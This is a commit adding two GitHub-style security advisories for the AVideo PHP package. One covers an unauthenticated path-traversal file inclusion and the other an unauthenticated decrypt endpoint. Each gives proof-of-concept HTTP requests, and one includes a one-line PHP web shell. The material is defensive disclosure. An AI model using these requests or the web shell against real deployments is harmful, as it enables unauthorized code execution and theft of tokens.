Publish Advisories

advisory-database[bot] · advisory-database[bot] · commit 4d48fdb24ffd · 2026-03-20T21:57:45.000Z
GHSA-8fw8-q79c-fp9m GHSA-mwjc-5j4x-r686
diff --git a/advisories/github-reviewed/2026/03/GHSA-8fw8-q79c-fp9m/GHSA-8fw8-q79c-fp9m.json b/advisories/github-reviewed/2026/03/GHSA-8fw8-q79c-fp9m/GHSA-8fw8-q79c-fp9m.json
@@ -0,0 +1,56 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-8fw8-q79c-fp9m",
+  "modified": "2026-03-20T21:55:32Z",
+  "published": "2026-03-20T21:55:31Z",
+  "aliases": [],
+  "summary": "AVideo has an Unauthenticated Local File Inclusion in API locale (RCE possible with writable PHP)",
+  "details": "### Summary\nAn unauthenticated API endpoint (`APIName=locale`) concatenates user input into an `include` path with no canonicalization or whitelist. Path traversal is accepted, so arbitrary PHP files under the web root can be included. In our test this yielded confirmed file disclosure and code execution of existing PHP content (e.g., `view/about.php`), and it *can* escalate to RCE if an attacker can place or control a PHP file elsewhere in the tree. \n### Details\n- Entry point: `plugin/API/get.json.php` sets `$global['bypassSameDomainCheck']=1` and merges GET/POST/JSON into `$parameters` without authentication or API secret.\n- Handler: `plugin/API/API.php`, method `get_api_locale()` (lines ~5009–5023):\n  ```php\n  $parameters['language'] = strtolower($parameters['language']);\n  $file = \"{$global['systemRootPath']}locale/{$parameters['language']}.php\";\n  if (!file_exists($file)) { return new ApiObject(\"This language does not exists\"); }\n  include $file;\n  ```\n  No validation is performed; `../` traversal is accepted.\n- Because `include` executes PHP, any reachable PHP file is executed in the web server context.\n\n### PoC\n1. Fetch an arbitrary PHP file (no auth):\n   ```\n   GET /plugin/API/get.json.php?APIName=locale&language=../view/about HTTP/1.1\n   Host: <target>\n   ```\n   Response returns the rendered About page HTML, proving traversal outside `locale/`.\n2. RCE with an attacker PHP file (any writable PHP path):\n   ```\n   GET /plugin/API/get.json.php?APIName=locale&language=../videos/locale/shell&x=whoami\n   ```\n   If `shell.php` contains `<?php system($_GET['x']); ?>`, the response includes command output.\n\n### Impact\n- Unauthenticated file inclusion of arbitrary PHP files under the web root.\n- Confidential data leakage (e.g., configuration, secrets) via included PHP that renders output.\n- Potential RCE *if* any attacker-writable PHP file exists elsewhere (not confirmed in this build).\n- Affects any deployment with the API plugin enabled (default in docker-compose).\n\n### Mitigation\n- Reject path separators/dots and enforce a strict allowlist of locale slugs.\n- `realpath` the target and ensure it stays within `$systemRootPath/locale`.\n- Stop using `include` for translations; load data from vetted formats (JSON/array).\n- Add authentication (API secret/token) to the endpoint as a secondary control.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "wwbn/avideo"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "26.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-8fw8-q79c-fp9m"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/WWBN/AVideo"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-22",
+      "CWE-98"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-20T21:55:31Z",
+    "nvd_published_at": null
+  }
+}
diff --git a/advisories/github-reviewed/2026/03/GHSA-mwjc-5j4x-r686/GHSA-mwjc-5j4x-r686.json b/advisories/github-reviewed/2026/03/GHSA-mwjc-5j4x-r686/GHSA-mwjc-5j4x-r686.json
@@ -0,0 +1,58 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-mwjc-5j4x-r686",
+  "modified": "2026-03-20T21:55:12Z",
+  "published": "2026-03-20T21:55:12Z",
+  "aliases": [],
+  "summary": "AVideo has an unauthenticated decrypt oracle leaking any ciphertext",
+  "details": "### Summary\nThe API plugin exposes a `decryptString` action without any authentication. Anyone can submit ciphertext and receive plaintext. Ciphertext is issued publicly (e.g., `view/url2Embed.json.php`), so any user can recover protected tokens/metadata. Severity: High.\n\n### Details\n- Entry: `plugin/API/get.json.php` is unauthenticated.\n- Handler: `plugin/API/API.php` `get_api_decryptString()` (lines ~5945–5966):\n  ```php\n  $string = decryptString($_REQUEST['string']);\n  return new ApiObject($string, empty($string));\n  ```\n  No APISecret or user check occurs before decrypting.\n- Public ciphertext source: `view/url2Embed.json.php` returns `playLink`/`playEmbedLink` (`encryptString(json_encode(...))`) to any caller.\n\n### PoC\n1. Obtain ciphertext:\n   ```\n   GET /view/url2Embed.json.php?url=https://example.com/video.mp4\n   ```\n   Copy `playLink`.\n2. Decrypt without auth:\n   ```\n   POST /plugin/API/get.json.php?APIName=decryptString\n   Content-Type: application/x-www-form-urlencoded\n\n   string=<playLink ciphertext>\n   ```\n   Response contains the plaintext JSON (videoLink, title, users_id, etc.).\n\n### Impact\n- Any encrypted payload produced by the platform can be decrypted by anyone.\n- Leaks tokens/links intended to be confidential; enables replay and tampering where secrecy was assumed.\n\n### Mitigation\n- Require API secret or authenticated/authorized user for `decryptString`, or remove the endpoint.\n- Prefer one-way signatures (HMAC) instead of exposing generic decryption.\n- Rotate encryption keys/salts after patch to invalidate exposed ciphertexts.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "wwbn/avideo"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "26.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-mwjc-5j4x-r686"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/WWBN/AVideo"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-287",
+      "CWE-312",
+      "CWE-326",
+      "CWE-327"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-03-20T21:55:12Z",
+    "nvd_published_at": null
+  }
+}
